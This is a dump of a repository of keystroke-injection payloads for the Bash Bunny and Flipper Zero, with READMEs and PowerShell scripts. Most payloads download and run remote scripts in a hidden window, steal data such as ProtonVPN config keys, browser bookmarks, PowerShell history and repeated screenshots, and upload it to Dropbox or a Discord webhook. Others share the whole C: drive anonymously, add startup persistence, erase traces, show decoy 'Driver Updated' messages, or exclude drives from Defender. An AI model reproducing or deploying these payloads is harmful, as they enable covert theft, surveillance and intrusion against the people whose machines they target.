## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Powershell-History/payload.txt ================================================ REM Title: Powershell-History REM Author: atomiczsec REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/Printer-Recon/PR.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } function Clean-Exfil { # empty temp folder rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue # delete run box history reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f # Delete powershell history Remove-Item (Get-PSreadlineOption).HistorySavePath # Empty recycle bin Clear-RecycleBin -Force -ErrorAction SilentlyContinue } $F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt" Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1 DropBox-Upload -f $F1 Clean-Exfil ================================================ FILE: BashBunny/payloads/Printer-Recon/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon ## Description This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Printer-Recon/payload.txt ================================================ REM Title: Printer-Recon REM Author: atomiczsec REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/Priv-Paths/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon ## Description A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. ## Getting Started ### Dependencies * Discord Webhook or other service that uses webhooks * Windows 10

(back to top)

### Executing program * Plug in your device * Command will be entered in the command prompt to search for unqouted service paths so you can later exploit them for priv esc ``` wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Priv-Paths/payload.txt ================================================ REM Title: Priv-Paths REM Author: atomiczsec REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. REM Target: Windows 10 Q DELAY 3000 Q GUI r Q DELAY 1000 Q STRING cmd Q ENTER Q DELAY 500 Q STRING cd %HOMEPATH% Q ENTER Q DELAY 1000 Q STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt Q ENTER Q DELAY 1000 Q STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK Q ENTER Q DELAY 200 Q STRING del p.txt Q ENTER Q DELAY 100 Q STRING exit Q ENTER ================================================ FILE: BashBunny/payloads/Proton-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Proton-Hog A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. ## Description This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file Then dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Proton-Hog/payload.txt ================================================ REM Title: Proton-Hog REM Author: atomiczsec REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/Proton-Hog/s.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } # Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) { try { Write-Host "The VPN folder has not been found. " } catch { throw $_.Exception.Message } } else { $protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN" cd $protonVpnPath Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd Get-ChildItem | cd # Upload user.config to dropbox DropBox-Upload -f "user.config" } ================================================ FILE: BashBunny/payloads/Pwn-Drive/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Pwn-Drive A payload to share the victims "C:" drive to the network. ## Description This payload will share the entire victims "C:" drive to the entire network for further exploitation. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Pwn-Drive/c.ps1 ================================================ #Pwn-Drive #Enable Network Discovery netsh advfirewall firewall set rule group=”network discovery” new enable=yes #Enable File and Print netsh firewall set service type=fileandprint mode=enable profile=all #Setting Registry Values for allowing access to drive without credentials Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force #Sharing the Drive New-SmbShare -Name "Windows Update" -Path "C:\" ================================================ FILE: BashBunny/payloads/Pwn-Drive/payload.txt ================================================ REM Title: Pwn-Drive REM Author: atomiczsec REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/RanFunWare/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# RanFunWare A payload to prank your friends into thinking their computer got hit with ransomware. ## Description This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/RanFunWare/payload.txt ================================================ REM Title: RanFunWare REM Author: atomiczsec REM Description: This payload will prank your target into thinking their machine got hit with ransomware. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/RanFunWare/r.ps1 ================================================ #Hides Desktop Icons $Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 Get-Process "explorer"| Stop-Process #Changes Background #URL For the Image of your choice (Wanna Cry Ransomware Background) $url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" Invoke-WebRequest $url -OutFile C:\temp\test.jpg $setwallpapersrc = @" using System.Runtime.InteropServices; public class Wallpaper { public const int SetDesktopWallpaper = 20; public const int UpdateIniFile = 0x01; public const int SendWinIniChange = 0x02; [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); public static void SetWallpaper(string path) { SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); } } "@ Add-Type -TypeDefinition $setwallpapersrc [Wallpaper]::SetWallpaper("C:\temp\test.jpg") #Pop Up Message function MsgBox { [CmdletBinding()] param ( [Parameter (Mandatory = $True)] [Alias("m")] [string]$message, [Parameter (Mandatory = $False)] [Alias("t")] [string]$title, [Parameter (Mandatory = $False)] [Alias("b")] [ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] [string]$button, [Parameter (Mandatory = $False)] [Alias("i")] [ValidateSet('None','Hand','Question','Warning','Asterisk')] [string]$image ) Add-Type -AssemblyName PresentationCore,PresentationFramework if (!$title) {$title = " "} if (!$button) {$button = "OK"} if (!$image) {$image = "None"} [System.Windows.MessageBox]::Show($message,$title,$button,$image) } MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning ================================================ FILE: BashBunny/payloads/Screen-Shock/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: BashBunny/payloads/Screen-Shock/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Screen-Shock This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) ## Description This payload uses iwr to download 2 files * I.bat * c.ps1 **I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup **c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds Then the contents will then be sent to the DropBox for viewing pleasure ## Getting Started ### Dependencies * Pastebin or other file sharing service, Dropbox * Windows 10 * [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload

(back to top)

### Executing program * Plug in your device * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Screen-Shock/c.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } while(1){ Add-Type -AssemblyName System.Windows.Forms,System.Drawing $screens = [Windows.Forms.Screen]::AllScreens $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height) $bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height) $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png") $graphics.Dispose() $bmp.Dispose() start-sleep -Seconds 15 "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload } ================================================ FILE: BashBunny/payloads/Screen-Shock/payload.txt ================================================ REM Title: Screen-Shock REM Author: atomiczsec REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) REM Target: Windows 10 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: BashBunny/payloads/Screen-Shock/placeholder ================================================ ================================================ FILE: BashBunny/payloads/Spotify-Spy/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Spotify-Spy This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. ## Description Have you ever been too afraid to ask your co-worker for what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their spotify username for you so you dont have to socially interact with anyone! ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Spotify-Spy/SS.ps1 ================================================ #Spotify-Spy # See if file is a thing Test-Path -Path "$env:APPDATA\Spotify\Users" #Create varible for file name $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt" # Gets the name of the spotify user cd "$env:APPDATA\Spotify\Users" Get-ChildItem > $F1 # Copy Spotify User to Temp Directory to get sent to Dropbox Copy-Item "$F1" -Destination "$env:tmp/$F1" function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" rm $F1 $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: BashBunny/payloads/Spotify-Spy/payload.txt ================================================ REM Title: Spotify-Spy REM Author: atomiczsec REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. REM Target: Windows 10 Q DELAY 2000 Q GUI r Q DELAY 500 Q STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl Q ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/Water-UnMark/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Water-UnMark A payload to get rid of the ugly windows activation watermark. ## Description This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! ## Getting Started ### Dependencies * Unactivated Windows 10

(back to top)

### Executing program * Plug in your device ``` Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Water-UnMark/payload.txt ================================================ REM Title: Water-UnMark REM Author: atomiczsec REM Target OS: Windows 10 REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! DELAY 2000 GUI r DELAY 100 STRING powershell Start-Process powershell -verb runAs DELAY 1000 ALT Y DELAY 1000 STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ENTER DELAY 100 STRING Restart-Computer -Force ENTER ================================================ FILE: BashBunny/payloads/Water-UnMark/placeholder ================================================ ================================================ FILE: BashBunny/payloads/cApS-Troll/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# cApS-Troll This payload is meant to prank your victim with TURNING on AND off CAPS LOCK ## Description This payload is meant to prank your victim with TURNING on AND off CAPS LOCK ## Getting Started ### Dependencies * Pastebin or other file sharing service, Discord webhook or other webhook service * Windows 10,11 * [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

(back to top)

### Executing program * Plug in your device * Define the `DEFINE TARGET_URL example.com` * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/cApS-Troll/a.ps1 ================================================ while (1){ Start-Sleep -Second 45 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') } ================================================ FILE: BashBunny/payloads/cApS-Troll/payload.txt ================================================ REM Title: cApS-Troll REM Author: atomiczsec REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/placeholder ================================================ ================================================ FILE: FlipperZero/payloads/Bookmark-Hog/BH.ps1 ================================================ #Bookmark-Hog # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The chrome bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The edge bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: FlipperZero/payloads/Bookmark-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Bookmark-Hog A payload to exfiltrate bookmarks of the 2 most popular browsers ## Description This payload will enumerate through the browser directories, looking for the file that stores the bookmark history These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Bookmark-Hog/payload.txt ================================================ REM Title: Bookmark-Hog REM Author: atomiczsec REM Description: This payload is meant to exfiltrate bookmarks to the FlipperZero REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER ================================================ FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Browser-Devil A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers ## Description This payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers Finally, dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Admin Priveladges on the Device you are targeting * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)
